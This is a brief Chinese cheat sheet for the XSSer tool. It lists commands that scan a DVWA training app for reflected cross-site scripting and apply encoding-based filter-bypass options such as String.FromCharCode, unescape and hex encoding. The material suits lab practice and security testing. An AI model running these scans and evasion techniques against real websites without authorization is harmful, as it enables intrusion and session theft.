常用命令
xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=d23e469411707ff8210717e67c521a81" -s -v --reverse-check
验证是否存在xss
xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=d23e469411707ff8210717e67c521a81" -s -v --heuristic
绕过命令
--Str Use method String.FromCharCode()
--Une Use Unescape() function
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem=CEM Try -manually- different Character Encoding Mutations
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" -- cookie="security=high; PHPSESSID=d23e469411707ff8210717e67c521a81" -- Cem='Mix,Une,Str,Hex'
注入命令
其他命令
--gtk 开启图形化界面
网友评论